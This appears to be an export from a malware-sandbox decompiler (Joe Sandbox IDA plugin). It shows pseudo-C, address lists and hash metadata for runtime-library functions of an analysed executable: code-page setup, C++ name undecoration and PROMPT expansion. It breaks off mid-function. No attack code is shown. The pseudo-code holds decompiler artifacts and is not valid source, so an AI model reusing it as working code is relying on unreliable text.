Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 45b215644b32be72b37373fea98e45cfcb6144e2b6c8d813f4cf165bb46000dc
Instruction ID: 394d644e92979e58d1727278d88ec531549af90e45284f9f47c10edca1bd5e19
Opcode Fuzzy Hash: 45b215644b32be72b37373fea98e45cfcb6144e2b6c8d813f4cf165bb46000dc
Instruction Fuzzy Hash: 30D15C71A04311AFDB20AF76D881A6F77A8AF08719F51516FF91197282EB3DCB008B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004342BD Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004342BD(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0x454264; // 0x8c4320d5
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if( *((intOrPtr*)(_t252 + 0xa8)) == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0x44b9c0;
					 *(_t252 + 0x94) = 0x44bc40;
					 *(_t252 + 0x98) = 0x44bdc0;
					 *(_t252 + 4) = 1;
					L48:
					return E004085C2(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *(_t252 + 8) != 0) {
					L3:
					_v52 = E00430BC8(1, 4);
					E0042E2C2(_t205);
					_v32 = E00430BC8(0x180, 2);
					E0042E2C2(_t205);
					_t237 = E00430BC8(0x180, 1);
					_v44 = _t237;
					E0042E2C2(_t205);
					_v36 = E00430BC8(0x180, 1);
					E0042E2C2(_t205);
					_v40 = E00430BC8(0x101, 1);
					E0042E2C2(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E0042E2C2(_v52);
						E0042E2C2(_v32);
						E0042E2C2(_t237);
						E0042E2C2(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E0042E253(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E0042E253(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E00435592(0xff, _t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E0042E2C2( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E0042E2C2( *(_t252 + 0x94) - 0x80);
											E0042E2C2( *(_t252 + 0x98) - 0x80);
											E0042E2C2( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E0042E2C2(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E004097A0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_t204 = E0043DCA8(__edx,  &_v92, 0, _t213, 0x1004, _t131);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x004342bd
0x004342c5
0x004342cc
0x004342d1
0x004342d4
0x004342d7
0x004342da
0x004342dc
0x004342df
0x004342e5
0x004342e8
0x004342eb
0x004342ee
0x004342f3
0x004346d6
0x004346d8
0x004346da
0x004346da
0x004346dd
0x004346e3
0x004346e3
0x004346e5
0x004346eb
0x004346f1
0x004346fb
0x00434705
0x0043470c
0x0043471a
0x0043471a
0x004342f9
0x004342fc
0x00434301
0x0043431f
0x00434329
0x0043432c
0x0043433f
0x00434342
0x0043434f
0x00434352
0x00434355
0x00434367
0x0043436a
0x0043437c
0x0043437f
0x00434384
0x0043438a
0x0043469f
0x004346a2
0x004346aa
0x004346b0
0x004346b8
0x004346c2
0x004346c2
0x00000000
0x00434399
0x00434399
0x0043439e
0x00000000
0x004343b5
0x004343b5
0x004343b7
0x004343b7
0x004343ba
0x004343bb
0x004343d1
0x00000000
0x00000000
0x004343d7
0x004343dd
0x00000000
0x00000000
0x004343e3
0x004343e6
0x004343ec
0x00434442
0x00434445
0x0043444f
0x00434464
0x00434468
0x0043446d
0x00434470
0x00434472
0x00000000
0x00000000
0x0043449b
0x004344a0
0x004344a3
0x004344a5
0x00000000
0x00000000
0x004344c0
0x004344c6
0x004344cb
0x004344d0
0x00000000
0x00000000
0x004344d6
0x004344df
0x004344e5
0x004344e8
0x004344eb
0x004344ee
0x004344f1
0x004344f7
0x004344fa
0x004344fd
0x00434500
0x00434502
0x00434508
0x0043450b
0x0043450d
0x004345dd
0x004345e4
0x004345e5
0x004345f0
0x004345f5
0x004345ff
0x00434601
0x00434602
0x00434604
0x00434605
0x0043460d
0x0043460d
0x0043460f
0x00434611
0x00434612
0x0043461d
0x00434622
0x00434626
0x00434634
0x0043463f
0x00434647
0x00434655
0x00434660
0x00434665
0x00434626
0x00434668
0x0043466b
0x00434671
0x0043467a
0x0043467f
0x00434688
0x00434691
0x0043469a
0x004346c3
0x004346c6
0x004346cc
0x00000000
0x004346cc
0x0043451a
0x00434573
0x00434576
0x00434579
0x00000000
0x00000000
0x0043457b
0x0043457e
0x0043457e
0x00434581
0x00434583
0x00000000
0x00000000
0x00434585
0x0043458b
0x0043458e
0x00434590
0x004345d3
0x004345d3
0x004345d6
0x004345d9
0x00000000
0x00000000
0x00000000
0x004345d9
0x00434598
0x004345a1
0x004345a3
0x004345a3
0x004345a5
0x004345a8
0x004345ab
0x004345ae
0x004345b0
0x004345b5
0x004345b8
0x004345bb
0x004345be
0x004345c0
0x004345c5
0x004345c6
0x004345c6
0x004345ca
0x004345cd
0x004345d0
0x00000000
0x004345d0
0x004345db
0x004345db
0x00000000
0x004345db
0x00434523
0x00434526
0x00434533
0x00434535
0x0043453a
0x0043453d
0x00434540
0x00434548
0x0043454a
0x00434558
0x0043455b
0x0043455e
0x00434561
0x00434563
0x00434566
0x0043456a
0x00000000
0x00434571
0x004343ee
0x004343f5
0x0043440f
0x00434412
0x00434415
0x00000000
0x00000000
0x00434417
0x0043441a
0x0043441a
0x0043441d
0x0043441f
0x00000000
0x00000000
0x00434421
0x00434427
0x00434429
0x00434438
0x00434438
0x0043443b
0x0043443d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0043442b
0x0043442b
0x0043442b
0x0043442f
0x00434434
0x00434434
0x00000000
0x0043442b
0x0043443f
0x00000000
0x0043443f
0x00434405
0x0043440a
0x00000000
0x0043440a
0x0043439e
0x0043438a
0x0043430f
0x00434314
0x00434319
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0043432C
_free.LIBCMT ref: 00434342
_free.LIBCMT ref: 00434355
_free.LIBCMT ref: 0043436A
_free.LIBCMT ref: 0043437F
GetCPInfo.KERNEL32(?,?), ref: 004343C9

Part of subcall function 0043DCA8: _free.LIBCMT ref: 0043DD13

_free.LIBCMT ref: 00434634
_free.LIBCMT ref: 00434647
_free.LIBCMT ref: 00434655
_free.LIBCMT ref: 00434660
_free.LIBCMT ref: 004346A2
_free.LIBCMT ref: 004346AA
_free.LIBCMT ref: 004346B0
_free.LIBCMT ref: 004346B8
_free.LIBCMT ref: 004346C6

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 9204e5d1e5c7bc6c957a88488ee6dc859d6294492e5c612a930046ac403e2ec4
Instruction ID: 660c393071f7b71d4368ba49587c616359fbd13e19e717da6b7a29fb207edcc4
Opcode Fuzzy Hash: 9204e5d1e5c7bc6c957a88488ee6dc859d6294492e5c612a930046ac403e2ec4
Instruction Fuzzy Hash: BBD1CF71E002059FDB10DFA5C881BEEBBF9BF49304F54506EE495A7382DB78A841CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5BA Relevance: 19.8, APIs: 13, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0040F5BA(void* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t93;
				intOrPtr _t94;
				intOrPtr* _t95;
				intOrPtr _t96;
				signed int* _t99;
				char* _t102;
				void* _t104;
				signed int* _t105;
				void* _t109;
				void* _t112;
				void* _t121;
				char* _t122;
				void* _t126;
				void* _t128;
				char* _t132;
				void* _t134;
				void* _t135;
				void* _t138;
				char* _t144;
				void* _t147;
				signed int* _t156;
				signed int _t167;
				char* _t177;
				signed int* _t179;
				char* _t180;
				intOrPtr* _t185;
				signed int* _t189;
				signed int* _t194;
				signed int _t199;
				signed int* _t202;
				void* _t206;
				signed int* _t209;
				void* _t210;

				_t206 = __edx;
				_t209 = _a4;
				 *_t209 =  *_t209 & 0x00000000;
				_t209[1] = _t209[1] & 0x00000000;
				_t167 = 0;
				while(1) {
					_t93 =  *0x456018; // 0x0
					_t94 =  *_t93;
					if(_t94 == 0 || _t94 == 0x40) {
						break;
					}
					if( *0x456024 == 0 ||  *0x456025 != 0) {
						if( *_t209 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t188 = E0040AA52( &_v108,  &_v44);
							E0040AEC8(_t159,  &_v52, _t209);
							 *_t209 = _v52;
							_t209[1] = _v48;
							if(_t167 != 0) {
								_t189 = E0040AE59(_t188,  &_v116, 0x5b, _t209);
								_t210 = _t210 + 0xc;
								_t167 = 0;
								 *_t209 =  *_t189;
								_t209[1] = _t189[1];
							}
						}
						_t102 =  *0x456018; // 0x0
						if( *_t102 != 0x3f) {
							_t104 = E00410E5C(_t206, _t207,  &_v92, 1, 0);
							_t177 =  &_v100;
							L37:
							_t210 = _t210 + 0xc;
							L38:
							_t105 = E0040AEC8(_t104, _t177, _t209);
							L39:
							_t179 = _t105;
							 *_t209 =  *_t179;
							_t209[1] = _t179[1];
							L40:
							if(_t209[1] == 0) {
								continue;
							}
							break;
						}
						_t15 = _t102 + 1; // 0x1
						_t180 = _t15;
						 *0x456018 = _t180;
						_t109 =  *_t180 - 0x24;
						if(_t109 == 0) {
							_t74 = _t180 - 1; // 0x0
							 *0x456018 = _t74;
							_t104 = E00410E5C(_t206, _t207,  &_v244, 1, 0);
							_t177 =  &_v84;
							goto L37;
						}
						_t112 = _t109 - 1;
						if(_t112 == 0) {
							L33:
							E0040A9D2( &_v76, 0x456018, 0x40);
							_v68 = "`anonymous namespace\'";
							_v64 = 0x15;
							E0040AEC8(E0040AA52( &_v236,  &_v68),  &_v20, _t209);
							 *_t209 = _v20;
							_t209[1] = _v16;
							_t185 =  *0x456010; // 0x0
							__eflags =  *_t185 - 9;
							if(__eflags != 0) {
								E0040B112(_t185,  &_v76);
							}
							goto L40;
						}
						_t121 = _t112 - 0x1a;
						if(_t121 == 0) {
							_t54 = _t180 + 1; // 0x2
							_t122 = _t54;
							__eflags =  *_t122 - 0x5f;
							if(__eflags != 0) {
								L32:
								_push( &_v204);
								_t126 = E0040AE59(_t180,  &_v212, 0x60, E0040D604(_t167, _t206, _t207, _t209, __eflags));
								_t210 = _t210 + 0x10;
								_t104 = E0040AEEA(_t126,  &_v220, 0x27);
								_t177 =  &_v228;
								goto L38;
							}
							__eflags =  *((char*)(_t180 + 2)) - 0x3f;
							if(__eflags != 0) {
								goto L32;
							}
							 *0x456018 = _t122;
							_t128 = E0040E576(_t206,  &_v188, 0, 0);
							_t210 = _t210 + 0xc;
							_t194 = E0040AEC8(_t128,  &_v196, _t209);
							 *_t209 =  *_t194;
							_t209[1] = _t194[1];
							_t132 =  *0x456018; // 0x0
							__eflags =  *_t132 - 0x40;
							if(__eflags != 0) {
								goto L40;
							}
							L31:
							 *0x456018 =  *0x456018 + 1;
							goto L40;
						}
						_t134 = _t121;
						if(_t134 == 0) {
							goto L33;
						}
						_t135 = _t134 - 8;
						if(_t135 == 0) {
							_t50 = _t180 + 1; // 0x2
							 *0x456018 = _t50;
							_t138 = E00410E5C(_t206, _t207,  &_v164, 1, 0);
							_t210 = _t210 + 0xc;
							_t105 = E0040AEC8(E0040AEEA(_t138,  &_v172, 0x5d),  &_v180, _t209);
							_t167 = 1;
							goto L39;
						}
						_t225 = _t135 == 8;
						if(_t135 == 8) {
							_v12 = _v12 & 0x00000000;
							_t20 = _t180 + 1; // 0x2
							_v8 = _v8 & 0x00000000;
							__eflags = 0;
							 *0x456018 = _t20;
							while(1) {
								E00410E5C(_t206, 0,  &_v36, 1, 0);
								_t199 = _v32;
								_t210 = _t210 + 0xc;
								__eflags = _t199;
								if(_t199 != 0) {
									_v12 = _v12 & 0x00000000;
									_t207 = 0;
									__eflags = 0;
									_t199 = 2;
								} else {
									__eflags = 0;
									if(0 == 0) {
										_t207 = _v36;
										_v12 = _v36;
									} else {
										_v28 = _v36;
										_v24 = _t199;
										_v60 = "::";
										_v56 = 2;
										E0040AF6A( &_v28,  &_v60);
										_t156 = E0040AEC8( &_v28,  &_v140,  &_v12);
										_t207 =  *_t156;
										_t199 = _t156[1];
										_v12 =  *_t156;
									}
								}
								_v8 = _t199;
								__eflags = _t199;
								if(__eflags != 0) {
									break;
								}
								_t144 =  *0x456018; // 0x0
								__eflags =  *_t144 - 0x40;
								if( *_t144 != 0x40) {
									continue;
								}
								__eflags = _t199;
								if(__eflags != 0) {
									break;
								}
								_t147 = E0040AE59(_t199,  &_v148, 0x5b,  &_v12);
								_t210 = _t210 + 0xc;
								_t202 = E0040AEEA(_t147,  &_v156, 0x5d);
								 *_t209 =  *_t202;
								_t209[1] = _t202[1];
								goto L31;
							}
							_t209[1] = _t209[1] & 0x00000000;
							 *_t209 =  *_t209 & 0x00000000;
							_t209[1] = 2;
							goto L40;
						} else {
							_t104 = E0040E395(_t180, _t206, _t225,  &_v124);
							_t177 =  &_v132;
							goto L38;
						}
					} else {
						L47:
						return _t209;
					}
				}
				_t95 =  *0x456018; // 0x0
				_t96 =  *_t95;
				if(_t96 == 0) {
					__eflags =  *_t209;
					_push(1);
					if( *_t209 != 0) {
						_v20 = "::";
						_v16 = 2;
						_t99 = E0040AEC8(E0040AEA6(E0040AAF4( &_v100),  &_v92,  &_v20),  &_v84, _t209);
						 *_t209 =  *_t99;
						_t209[1] = _t99[1];
					} else {
						E0040ADC2(_t209);
					}
				} else {
					if(_t96 != 0x40) {
						_t209[1] = _t209[1] & 0x00000000;
						 *_t209 =  *_t209 & 0x00000000;
						_t209[1] = 2;
					}
				}
				goto L47;
			}

0x0040f5ba
0x0040f5c5
0x0040f5c9
0x0040f5cc
0x0040f5d0
0x0040f5d2
0x0040f5d2
0x0040f5d7
0x0040f5db
0x00000000
0x00000000
0x0040f5f0
0x0040f602
0x0040f607
0x0040f612
0x0040f623
0x0040f625
0x0040f62d
0x0040f632
0x0040f637
0x0040f645
0x0040f647
0x0040f64a
0x0040f64e
0x0040f653
0x0040f653
0x0040f637
0x0040f656
0x0040f65e
0x0040f8e0
0x0040f8e5
0x0040f8e8
0x0040f8e8
0x0040f8eb
0x0040f8ef
0x0040f8f4
0x0040f8f4
0x0040f8f8
0x0040f8fd
0x0040f900
0x0040f904
0x00000000
0x00000000
0x00000000
0x0040f904
0x0040f664
0x0040f664
0x0040f667
0x0040f670
0x0040f673
0x0040f8bb
0x0040f8c0
0x0040f8ce
0x0040f8d3
0x00000000
0x0040f8d3
0x0040f679
0x0040f67c
0x0040f862
0x0040f86c
0x0040f874
0x0040f882
0x0040f895
0x0040f89d
0x0040f8a2
0x0040f8a5
0x0040f8ab
0x0040f8ae
0x0040f8b4
0x0040f8b4
0x00000000
0x0040f8ae
0x0040f682
0x0040f685
0x0040f7cf
0x0040f7cf
0x0040f7d2
0x0040f7d5
0x0040f829
0x0040f82f
0x0040f83f
0x0040f844
0x0040f852
0x0040f857
0x00000000
0x0040f857
0x0040f7d7
0x0040f7db
0x00000000
0x00000000
0x0040f7df
0x0040f7ed
0x0040f7f2
0x0040f804
0x0040f808
0x0040f80d
0x0040f810
0x0040f815
0x0040f818
0x00000000
0x00000000
0x0040f81e
0x0040f81e
0x00000000
0x0040f81e
0x0040f68c
0x0040f68f
0x00000000
0x00000000
0x0040f695
0x0040f698
0x0040f78e
0x0040f793
0x0040f7a1
0x0040f7a6
0x0040f7c3
0x0040f7c8
0x00000000
0x0040f7c8
0x0040f69e
0x0040f6a1
0x0040f6b5
0x0040f6b9
0x0040f6bc
0x0040f6c0
0x0040f6c2
0x0040f6c7
0x0040f6cf
0x0040f6d4
0x0040f6d7
0x0040f6da
0x0040f6dc
0x0040f72a
0x0040f72e
0x0040f72e
0x0040f732
0x0040f6de
0x0040f6de
0x0040f6e0
0x0040f722
0x0040f725
0x0040f6e2
0x0040f6e5
0x0040f6eb
0x0040f6f2
0x0040f6f9
0x0040f700
0x0040f713
0x0040f718
0x0040f71a
0x0040f71d
0x0040f71d
0x0040f6e0
0x0040f733
0x0040f736
0x0040f738
0x00000000
0x00000000
0x0040f73a
0x0040f73f
0x0040f742
0x00000000
0x00000000
0x0040f744
0x0040f746
0x00000000
0x00000000
0x0040f755
0x0040f75a
0x0040f76d
0x0040f771
0x0040f776
0x00000000
0x0040f776
0x0040f77e
0x0040f782
0x0040f785
0x00000000
0x0040f6a3
0x0040f6a7
0x0040f6ad
0x00000000
0x0040f6ad
0x0040f972
0x0040f972
0x0040f977
0x0040f977
0x0040f5f0
0x0040f90a
0x0040f90f
0x0040f913
0x0040f926
0x0040f929
0x0040f92b
0x0040f939
0x0040f940
0x0040f962
0x0040f969
0x0040f96e
0x0040f92d
0x0040f92f
0x0040f92f
0x0040f915
0x0040f917
0x0040f919
0x0040f91d
0x0040f920
0x0040f920
0x0040f917
0x00000000

APIs

DName::operator+.LIBCMT ref: 0040F625
DName::operator+.LIBCMT ref: 0040F768

Part of subcall function 0040AF6A: shared_ptr.LIBCMT ref: 0040AF86

DName::operator+.LIBCMT ref: 0040F7B4
DName::operator+.LIBCMT ref: 0040F7C3
DName::operator+.LIBCMT ref: 0040F713

Part of subcall function 00410E5C: DName::operator=.LIBVCRUNTIME ref: 00410EEB

DName::operator+.LIBCMT ref: 0040F8EF
DName::operator=.LIBVCRUNTIME ref: 0040F92F
DName::DName.LIBVCRUNTIME ref: 0040F947
DName::operator+.LIBCMT ref: 0040F956
DName::operator+.LIBCMT ref: 0040F962

Part of subcall function 00410E5C: Replicator::operator[].LIBCMT ref: 00410E99

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
String ID:
API String ID: 1026175760-0
Opcode ID: b9ec8fde1732da4da77b6cf219417bb4d3e21aed136bc8a55552b3d5b0f771c9
Instruction ID: 234bb0d87997fba052e0aa7dfc3deb1f744760d5811272ca7eda4f7dde503b10
Opcode Fuzzy Hash: b9ec8fde1732da4da77b6cf219417bb4d3e21aed136bc8a55552b3d5b0f771c9
Instruction Fuzzy Hash: 94C1B2B1900308AFDB24DFA4D845BEAB7F4AB05304F14447EE149B76C1EB789A49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405220 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 291
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00405220(void* __edi, intOrPtr _a4) {
				WCHAR* _v8;
				signed short* _v12;
				intOrPtr _v16;
				long _v20;
				long _v24;
				short _v544;
				short _v1064;
				char _v1584;
				long _t119;
				long _t120;
				intOrPtr _t127;
				void* _t170;

				_t119 =  &_v1064;
				0x400000(_t119);
				_t120 = GetEnvironmentVariableW(L"PROMPT",  &_v1064, _t119);
				_v24 = _t120;
				if(_v24 == 0) {
					L2:
					lstrcpyW( &_v1064, L"$P$G");
					L3:
					_v12 =  &_v1064;
					_v8 =  &_v1584;
					if(_a4 != 0) {
						 *_v8 = 0xd;
						_v8 =  &(_v8[1]);
						 *_v8 = 0xa;
						_v8 =  &(_v8[1]);
					}
					 *_v8 = 0;
					while(( *_v12 & 0x0000ffff) != 0) {
						if(( *_v12 & 0x0000ffff) == 0x24) {
							_v12 =  &(_v12[1]);
							_t127 = E00413AE2( *_v12 & 0x0000ffff);
							_t170 = _t170 + 4;
							_v16 = _t127;
							_v16 = _v16 - 0x24;
							if(_v16 > 0x3b) {
								L45:
								_v12 =  &(_v12[1]);
								 *_v8 = 0;
								L46:
								continue;
							}
							_t37 = _v16 + 0x405640; // 0xcccccc11
							switch( *((intOrPtr*)(( *_t37 & 0x000000ff) * 4 +  &M004055F4))) {
								case 0:
									 *_v8 = 0x24;
									_v8 =  &(_v8[1]);
									goto L45;
								case 1:
									if( *0x400000 != 0) {
										__eax =  *0x400000; // 0x905a4d
										__ecx = __eax[2];
										__edx = _v8;
										__eax = E004097A0(__edi, _v8, 0x2b, __eax[2]);
										__eax =  *0x400000; // 0x905a4d
										__ecx = __eax[2];
										__edx = _v8;
										__eax = __edx + __ecx * 2;
										_v8 = __edx + __ecx * 2;
									}
									goto L45;
								case 2:
									__ecx = 0x26;
									__edx = _v8;
									 *_v8 = __cx;
									_v8 =  &(_v8[1]);
									_v8 =  &(_v8[1]);
